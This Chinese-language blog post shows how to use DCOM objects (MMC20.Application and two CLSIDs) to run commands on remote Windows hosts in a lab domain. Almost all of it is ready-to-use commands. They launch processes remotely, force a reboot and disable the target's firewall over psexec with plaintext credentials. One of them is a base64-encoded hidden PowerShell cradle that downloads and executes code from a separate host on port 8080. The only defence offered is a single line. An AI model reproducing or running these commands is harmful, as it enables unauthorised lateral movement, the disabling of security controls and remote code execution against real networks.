利用DCOM实现远程命令执行

1.前言

实现命令执行的方式之前我写过文章来总结，前两天又发现了一个新方法DCOM，于是有了这篇文章。

2.实现过程

2.1通过DCOM在本机执行命令

实现条件：

1. 管理员权限的powershell
2. 查找DCOM组件MMC Application Class如下图，命令为

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication |Where-Object{$_.Name -like "MM*"} 

命令：

$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","127.0.0.1")) $com.Document.ActiveView.ExecuteShellCommand $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimized") 

2.2通过DCOM控制远程主机执行命令

实现条件：

1. 管理员权限的powershell
2. 客户端关闭防火墙
3. 服务端需要域管的administrator账户或者目标主机具有管理员权限的账户
4. 双方主机都需有MMC Application Class这个DCOM组件。
   命令：
   
   

net use \\192.168.124.3 "123" /u:"test\administrator" netsh -r 192.168.124.3 -u TEST\administrator -p 123 advfirewall set currentprofile firewallpolicy allowinbound,allowoutbound #远程关闭防火墙不过一般会失败，默认不会开启远程管理防火墙的这个权限。 $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.124.3")) $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimized") # 有可能弹不出计算器，但是可以将命令改为: $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c shutdown -r -t 1","Minimized") 发现远程主机会重启。 

如果上述命令执行失败，很有可能是防火墙开启造成的，这时候我们可以通过impacket来获取远程主机的shell然后再进行防火墙的配置。

psexec.exe test/lisi:123@192.168.124.3 netsh advfirewall firewall add rule name="any" protocol=TCP dir=in localport=any action=allow netsh advfirewall set currentprofile state off netsh advfirewall set allprofiles state off netsh advfirewall set currentprofile settings remotemanagement enable 

第二种命令：

$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.124.3") $obj = [System.Activator]::CreateInstance($com) $item = $obj.item() $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0) #测试成功，不需要对方主机的凭据，只需要当前主机的管理员权限即可。 

第三种命令：

$com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"192.168.124.3") $obj = [System.Activator]::CreateInstance($com) $obj.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0) #测试成功，不需要对方主机的凭据，只需要当前主机的管理员权限即可。 

2.3补充：

在192.168.124.2上执行命令，不需要执行net use命令：

 $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.124.3")) $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c powershell -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABjAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAGMALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMgA0AC4AMQA6ADgAMAA4ADAALwBoAHgASAByAHMASABXAEYASABKADkALwBEAFEAMABKAHMAZABxAFIAUAAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMgA0AC4AMQA6ADgAMAA4ADAALwBoAHgASAByAHMASABXAEYASABKADkAJwApACkAOwA=","Minimized") 

如果在执行这些命令之前执行了net use命令，获得了一个有权限的IPC管道(例如使用域控的凭据连接目标主机)，得到的结果也是一样的，也就是说net use命令存在与否并不影响结果。

3.参考文章

域渗透-利用DCOM在远程系统执行程序

4.防御方式

开启域防火墙